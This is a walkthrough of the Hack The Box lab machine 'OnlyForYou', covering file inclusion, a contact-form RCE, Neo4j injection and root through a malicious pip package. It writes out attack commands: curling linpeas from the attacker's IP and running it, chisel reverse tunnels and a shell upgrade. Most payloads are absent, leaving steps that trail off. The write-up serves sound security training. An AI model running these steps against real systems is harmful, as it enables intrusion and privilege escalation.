OnlyForYou

Write up for the HTB machine 'OnlyForYou'

1. Initial recon

1.1. nikto

nikto -host 10.10.11.210

- Server: nginx/1.18.0 (Ubuntu)
- Root page / redirects to: http://only4you.htb/
- nginx/1.18.0 appears to be outdated (current is at least 1.20.1).

1.2. nmap

nmap -sC -sV 10.10.11.210

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e883e0a9fd43df38198aaa35438411ec (RSA)
|   256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_  256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Only4you
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.3. web application recon

Under the Frequently Asked Questions section there is a "Are there some products available to check?" section which leads to beta.only4you.htb

From beta.only4you.htb we can download some source code

Looking in app.py we can find

  • /list

  • /download

  • /convert (also linked on the nav bar of the web app)

  • /resize (also linked on the nav bar of the web app)

after uploading an image, we are redirected to a download page where we can download a resized image of the one we just uploaded, here we find a Local File Inclusion vulnerability where we are able to download any file on the system that we want.

  • capture the download in BurpSuite and change the file name in the POST request parameter image

by downloading /etc/passwd we can see some users

we know from our nikto scan that the server is running nginx so we should also take a look at /etc/nginx/sites-available/default

this reveals that the main app.py is at /var/www/only4you.htb/app.py

looking in app.py we can see an import for forms.py

in forms.py we can see that there is RCE via the lines

with the payload being delivered through the post request on the contact form found on only4you.htb

now we have a reverse shell as the user www-data

2. user.txt

With our www-data reverse shell let's start by making it an interactive shell by running python3 -c 'import pty;pty.spawn("/bin/bash");'

2.1. linpeas

By navigating to /tmp on the victim machine, and hosting a http server using python3 -m http.server on our attacking machine, we can then run curl 10.10.x.x:8000/linpeas.sh > linpeas.sh and chmod +x linpeas.sh on the victim machine to download and run linpeas on the victim machine to (hopefully) find any simple privilege escalation vectors.

the most interesting output from linpeas is the active ports

so let's investigate these more

simply curling them with curl 127.0.0.1:PORT reveals:

2.2. chisel (port forwarding)

so now let's try and port forward them so we can view them in the browser

let's use Chisel

similar to linpeas we also need to curl chisel to the victim machine using the same method

  • once chisel is on the victim machine run the following commands

    • ./chisel server -p 12312 --reverse on your attacking machine

    • ./chisel client 10.10.x.x:12312 R:8001:127.0.0.1:8001 on the victim machine for the admin dashboard

    • ./chisel client 10.10.14.6:12312 R:3000:127.0.0.1:3000 on the victim machine for the local git service

then we can navigate to 127.0.0.1:8001/login and we will be presented with a log in screen

trying some default credentials

leads us to a dashboard

2.3. neo4j injection

we can see on the dashboard that the database has been updated to Neo4j so let's see if there are any vulnerabilities

from HackTricks there are a couple of injection payloads we can try

to catch these payloads, spin up another http server using python on your attacking machine, python3 -m http.server

This payload we can find on hacktricks, but noticing that the above payload works, and this one doesn't we can slightly modify it

to this

from the above payload we can see that there are two labels user and employee (check the shell where you're running your python server)

finally, this payload

is modified to this

and we are presented with this output

now let's try and crack these hashes on CrackStation

we are now able to ssh into the machine with the credentials

user.txt is located in /home/john

3. root.txt

Remembering we also port forwarded the local git service which is at port 3000. at localhost:3000/explore/users we can see that john is also a user, so let's see if he reuses his credentials, he does. Unfortunately there's nothing really interesting on the git repositories

sudo -l on our ssh terminal shows

The first link after googling "pip install download vuln" returns us this article

clone the repo linked in the article to our attacking machine

and then we can simply change setup.py to

run python -m build in the directory of the cloned repo to create our payload

to get the payload to work we first need to make the Test repo at http://localhost:3000/john/Test public and then we can upload our payload

our command on the victim machine will finally be:

then run /bin/bash -p on the victim machine and we are root!

PreviousNetmonNextOptimum

Last updated

Was this helpful?